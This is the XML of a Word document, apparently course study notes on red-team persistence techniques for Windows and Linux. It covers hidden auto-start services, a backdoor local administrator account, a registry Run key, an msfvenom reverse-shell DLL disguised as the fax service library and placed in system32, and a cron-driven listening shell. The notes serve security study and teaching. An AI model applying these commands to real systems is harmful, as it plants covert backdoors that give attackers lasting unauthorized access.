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A62B" w14:textId="0A2ECF12" w:rsidR="002D7B03" w:rsidRPr="00FC6C41" w:rsidRDefault="00FC6C41">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FC6C41">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Persistence</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40CAAEE5" w14:textId="3AA45A5D" w:rsidR="00FC6C41" w:rsidRDefault="00FC6C41"/>
    <w:p w14:paraId="4E2B6D16" w14:textId="30576D76" w:rsidR="00FC6C41" w:rsidRDefault="00FC6C41">
      <w:r>
        <w:t>Keeping access to the machine after gaining access</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29FE0931" w14:textId="0000DA8F" w:rsidR="00FC6C41" w:rsidRDefault="00FC6C41" w:rsidP="00FC6C41">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Another word for backdooring</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BCD4EB4" w14:textId="253A5711" w:rsidR="00FC6C41" w:rsidRDefault="00FC6C41" w:rsidP="00FC6C41">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Clean and dirty</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A2AE391" w14:textId="1F1264F0" w:rsidR="00FC6C41" w:rsidRDefault="00FC6C41" w:rsidP="00FC6C41"/>
    <w:p w14:paraId="1FB707F5" w14:textId="6FD1B2EE" w:rsidR="00FC6C41" w:rsidRDefault="00FC6C41" w:rsidP="00FC6C41">
      <w:r>
        <w:t>Clean</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="572709A2" w14:textId="73D8F56C" w:rsidR="00FC6C41" w:rsidRDefault="00FC6C41" w:rsidP="00FC6C41">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Seamless to user</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="654C238C" w14:textId="4A17D72E" w:rsidR="00FC6C41" w:rsidRDefault="00FC6C41" w:rsidP="00FC6C41">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Doesn’t cause errors or crashes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FA6D56F" w14:textId="3DE5DC7B" w:rsidR="00FC6C41" w:rsidRDefault="00FC6C41" w:rsidP="00FC6C41">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>DLL backdooring (instead of replacing)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CA95995" w14:textId="36484229" w:rsidR="00FC6C41" w:rsidRDefault="00FC6C41" w:rsidP="00FC6C41">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Creating a new service</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D1EF2D1" w14:textId="54BE9CEB" w:rsidR="00FC6C41" w:rsidRDefault="00FC6C41" w:rsidP="00FC6C41">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Application on startup</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F96B532" w14:textId="2EA911FE" w:rsidR="00FC6C41" w:rsidRDefault="00FC6C41" w:rsidP="00FC6C41"/>
    <w:p w14:paraId="27241611" w14:textId="36429898" w:rsidR="00FC6C41" w:rsidRDefault="00FC6C41" w:rsidP="00FC6C41">
      <w:r>
        <w:t xml:space="preserve">As long as </w:t>
      </w:r>
      <w:r w:rsidRPr="00FC6C41">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>app runs in background</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> and doesn’t display any GUI on the screen, then this is considered clean</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53FEF7BD" w14:textId="1690DEAC" w:rsidR="00FC6C41" w:rsidRDefault="00FC6C41" w:rsidP="00FC6C41"/>
    <w:p w14:paraId="4EBB1D43" w14:textId="3814F9AB" w:rsidR="00FC6C41" w:rsidRDefault="00FC6C41" w:rsidP="00FC6C41">
      <w:r>
        <w:t>Dirty</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="207A87E5" w14:textId="7F4F7481" w:rsidR="00FC6C41" w:rsidRDefault="00FC6C41" w:rsidP="00FC6C41">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Obvious to user</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="263576BF" w14:textId="54056022" w:rsidR="00FC6C41" w:rsidRDefault="00FC6C41" w:rsidP="00FC6C41">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Causes errors/crashes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="208C691D" w14:textId="063353B6" w:rsidR="00FC6C41" w:rsidRDefault="00FC6C41" w:rsidP="00FC6C41">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Last resort</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A1F2D1A" w14:textId="61737CA9" w:rsidR="00FC6C41" w:rsidRDefault="00FC6C41" w:rsidP="00FC6C41">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>DLL replacement</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26823A5C" w14:textId="75BCB2CA" w:rsidR="00FC6C41" w:rsidRDefault="00FC6C41" w:rsidP="00FC6C41">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Application </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Shimms</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="6323F7C0" w14:textId="06DDCE35" w:rsidR="00FC6C41" w:rsidRDefault="00FC6C41" w:rsidP="00FC6C41">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Accessibility feature</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="063C86EE" w14:textId="1BB8D793" w:rsidR="00FC6C41" w:rsidRDefault="00FC6C41" w:rsidP="00FC6C41">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Any dirty persistence can be made clean with enough knowledge</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D32EE88" w14:textId="4EA0966E" w:rsidR="000E6AC0" w:rsidRDefault="000E6AC0" w:rsidP="000E6AC0"/>
    <w:p w14:paraId="01B7CA97" w14:textId="77777777" w:rsidR="000E6AC0" w:rsidRDefault="000E6AC0" w:rsidP="000E6AC0"/>
    <w:p w14:paraId="630DB3C4" w14:textId="74F329F6" w:rsidR="000E6AC0" w:rsidRPr="008932D3" w:rsidRDefault="000E6AC0" w:rsidP="000E6AC0">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008932D3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Windows Persistence</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F9DAA72" w14:textId="77777777" w:rsidR="000E6AC0" w:rsidRPr="000E6AC0" w:rsidRDefault="000E6AC0" w:rsidP="000E6AC0">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="60D6A575" w14:textId="66D0D7C9" w:rsidR="000E6AC0" w:rsidRDefault="000E6AC0" w:rsidP="000E6AC0">
      <w:r>
        <w:t>Creating a persistent service</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="134FCAE7" w14:textId="62FEBDC6" w:rsidR="000E6AC0" w:rsidRDefault="000E6AC0" w:rsidP="000E6AC0">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Sc create secret </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>BinPath</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>= “C:/secret.exe” start= auto</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61C35295" w14:textId="031973DF" w:rsidR="000E6AC0" w:rsidRDefault="000E6AC0" w:rsidP="000E6AC0">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Sc is service create</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="027ED95A" w14:textId="59DE00B1" w:rsidR="000E6AC0" w:rsidRDefault="000E6AC0" w:rsidP="000E6AC0">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Start= auto, is start automatically on startup</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34CD7113" w14:textId="42DF4320" w:rsidR="000E6AC0" w:rsidRDefault="000E6AC0" w:rsidP="000E6AC0">
      <w:r>
        <w:t>Activate service</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70A80C1B" w14:textId="2ABB670A" w:rsidR="000E6AC0" w:rsidRDefault="000E6AC0" w:rsidP="000E6AC0">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Sc query secret</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="726CA201" w14:textId="4AB8431D" w:rsidR="000E6AC0" w:rsidRDefault="000E6AC0" w:rsidP="000E6AC0">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Will show info of secret</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19F3991D" w14:textId="6D8DE046" w:rsidR="000E6AC0" w:rsidRDefault="000E6AC0" w:rsidP="000E6AC0">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Sc </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>qs</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> secret</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76E1DD7B" w14:textId="4B6E341E" w:rsidR="000E6AC0" w:rsidRDefault="000E6AC0" w:rsidP="000E6AC0">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Creates the query config to activate service</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DD22F19" w14:textId="7C6F321B" w:rsidR="000E6AC0" w:rsidRDefault="000E6AC0" w:rsidP="000E6AC0">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Sc delete secret</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50E2278D" w14:textId="02E3A10E" w:rsidR="000E6AC0" w:rsidRDefault="000E6AC0" w:rsidP="000E6AC0">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Deletes the file</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71A65147" w14:textId="581DE5AB" w:rsidR="000E6AC0" w:rsidRDefault="000E6AC0" w:rsidP="000E6AC0"/>
    <w:p w14:paraId="0E00B60E" w14:textId="7A2929BD" w:rsidR="000E6AC0" w:rsidRPr="000E6AC0" w:rsidRDefault="000E6AC0" w:rsidP="000E6AC0">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000E6AC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Creating a new user</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18333EAF" w14:textId="0DD3ABAD" w:rsidR="000E6AC0" w:rsidRDefault="000E6AC0" w:rsidP="000E6AC0">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Net user </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>RedTeam</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> /add *</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C6DBCC8" w14:textId="06FB8C9C" w:rsidR="000E6AC0" w:rsidRDefault="000E6AC0" w:rsidP="000E6AC0">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>* Allows you to (re)set password</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="599AC613" w14:textId="7B4DF8C3" w:rsidR="000E6AC0" w:rsidRDefault="000E6AC0" w:rsidP="000E6AC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E6AC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Hw</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000E6AC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> – try to find another way to add a user with a password  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="794D449A" w14:textId="6406F32E" w:rsidR="000E6AC0" w:rsidRPr="000E6AC0" w:rsidRDefault="000E6AC0" w:rsidP="000E6AC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Net </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>localgroup</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> administrators </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>RedTeam</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> /add</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79AC076C" w14:textId="06CFD96D" w:rsidR="000E6AC0" w:rsidRPr="00AB7FA1" w:rsidRDefault="000E6AC0" w:rsidP="000E6AC0">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>Adds user to local admin group</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ED4DC93" w14:textId="58236DB6" w:rsidR="00AB7FA1" w:rsidRDefault="00AB7FA1" w:rsidP="00AB7FA1">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6234D6C7" w14:textId="7A3E1F2F" w:rsidR="00AB7FA1" w:rsidRDefault="00AB7FA1" w:rsidP="00AB7FA1">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Creating a new registry key</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C3F4715" w14:textId="14D6B172" w:rsidR="00AB7FA1" w:rsidRDefault="00AB7FA1" w:rsidP="00AB7FA1">
      <w:r>
        <w:t>Tell windows, when it stars up an app, to use this registry key instead to start the application</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B62154B" w14:textId="04B700E8" w:rsidR="00AB7FA1" w:rsidRDefault="00AB7FA1" w:rsidP="00AB7FA1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v “secret” /t REG_SZ /f /d “C:\secret.exe”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BAA780E" w14:textId="0E3653E8" w:rsidR="00AB7FA1" w:rsidRDefault="00AB7FA1" w:rsidP="00AB7FA1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>/f overwrites any file currently called secret</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="553DAD5E" w14:textId="3C06E925" w:rsidR="00AB7FA1" w:rsidRDefault="00AB7FA1" w:rsidP="00AB7FA1">
      <w:r>
        <w:t>This adds the registry to the path location</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12637683" w14:textId="1B346CD2" w:rsidR="00AB7FA1" w:rsidRDefault="00AB7FA1" w:rsidP="00AB7FA1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>You’ll want this to be under a specific user like admin, rather than the system user</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0646130E" w14:textId="479777D7" w:rsidR="00AB7FA1" w:rsidRDefault="00AB7FA1" w:rsidP="00AB7FA1"/>
    <w:p w14:paraId="18DD44C8" w14:textId="172B8B01" w:rsidR="00AB7FA1" w:rsidRPr="00AB7FA1" w:rsidRDefault="00AB7FA1" w:rsidP="00AB7FA1">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AB7FA1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>DLL preloading</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E5BA05F" w14:textId="011C420A" w:rsidR="00AB7FA1" w:rsidRDefault="00AB7FA1" w:rsidP="00AB7FA1">
      <w:r>
        <w:t>Create a binary DLL with same name as one that’s on the system and then replace it</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="341E36DA" w14:textId="2F4EDD43" w:rsidR="00AB7FA1" w:rsidRDefault="00AB7FA1" w:rsidP="00AB7FA1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Msfvenom</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> -p windows/x64/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LHOST=&lt;addr&gt; LPORT=&lt;port&gt; -f </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>dll</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> &gt; fxsst.dll</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F8B15DF" w14:textId="3C047E5C" w:rsidR="00AB7FA1" w:rsidRDefault="00AB7FA1" w:rsidP="00AB7FA1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">-f for </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>dll</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="13705F00" w14:textId="3DD0BEE4" w:rsidR="00AB7FA1" w:rsidRDefault="00AB7FA1" w:rsidP="00AB7FA1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Creating a standard</w:t>
      </w:r>
      <w:r w:rsidR="00256416">
        <w:t xml:space="preserve"> 64-bit</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00256416">
        <w:t xml:space="preserve">reverse </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00256416">
        <w:t>tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00256416">
        <w:t xml:space="preserve"> shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C3808DF" w14:textId="38741C5E" w:rsidR="00256416" w:rsidRDefault="00256416" w:rsidP="00AB7FA1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Fxsst.ddl</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> is the fax service which will be a bit more lowkey as no one will usually be looking at the fax service compared to a http service </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59710DC0" w14:textId="1853C877" w:rsidR="00256416" w:rsidRDefault="00256416" w:rsidP="00256416">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Ls -l #shows files in local dirs.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54DB6350" w14:textId="542629AD" w:rsidR="00256416" w:rsidRDefault="00256416" w:rsidP="00256416">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Lcd /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>dir</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> #changes </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>dirs</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> locally</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5719A744" w14:textId="64C1D6AF" w:rsidR="00256416" w:rsidRDefault="00256416" w:rsidP="00256416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fxsst.ddl</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> C:\windows\system32</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B55DAC7" w14:textId="1EB1A99A" w:rsidR="00256416" w:rsidRDefault="00256416" w:rsidP="00256416">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Gets file into system32</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20C4491F" w14:textId="0B3A99F4" w:rsidR="008932D3" w:rsidRDefault="008932D3" w:rsidP="008932D3"/>
    <w:p w14:paraId="5F3CDE03" w14:textId="77777777" w:rsidR="00A16651" w:rsidRDefault="00A16651" w:rsidP="008932D3">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2F50B719" w14:textId="7E13F8CD" w:rsidR="008932D3" w:rsidRDefault="008932D3" w:rsidP="008932D3">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008932D3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Linux Persistence</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E3CC345" w14:textId="1C1BEA29" w:rsidR="008932D3" w:rsidRDefault="008932D3" w:rsidP="008932D3">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="75F2F44B" w14:textId="66002D61" w:rsidR="008932D3" w:rsidRDefault="008932D3" w:rsidP="008932D3">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Look at crontab</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FD9D7F4" w14:textId="0A6A23EE" w:rsidR="008932D3" w:rsidRPr="008932D3" w:rsidRDefault="008932D3" w:rsidP="008932D3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="008932D3">
        <w:t xml:space="preserve">Creating a constantly open listening port to shell into </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CF5E6E0" w14:textId="67DD3B11" w:rsidR="008932D3" w:rsidRDefault="008932D3" w:rsidP="008932D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2FDF82" wp14:editId="20F94689">
            <wp:extent cx="4857750" cy="3059153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r="47485" b="41206"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4860974" cy="3061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31721" w14:textId="2C816250" w:rsidR="008932D3" w:rsidRPr="008932D3" w:rsidRDefault="008932D3" w:rsidP="008932D3">
      <w:r w:rsidRPr="008932D3">
        <w:t>This process starts at 5am every day</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AA55B78" w14:textId="5A100CE3" w:rsidR="008932D3" w:rsidRPr="008932D3" w:rsidRDefault="008932D3" w:rsidP="008932D3">
      <w:r w:rsidRPr="008932D3">
        <w:t>The last line of code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34CB3968" w14:textId="70594062" w:rsidR="008932D3" w:rsidRPr="008932D3" w:rsidRDefault="008932D3" w:rsidP="008932D3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="008932D3">
        <w:t xml:space="preserve">Changes the process to start every 5 minutes </w:t>
      </w:r>
    </w:p>
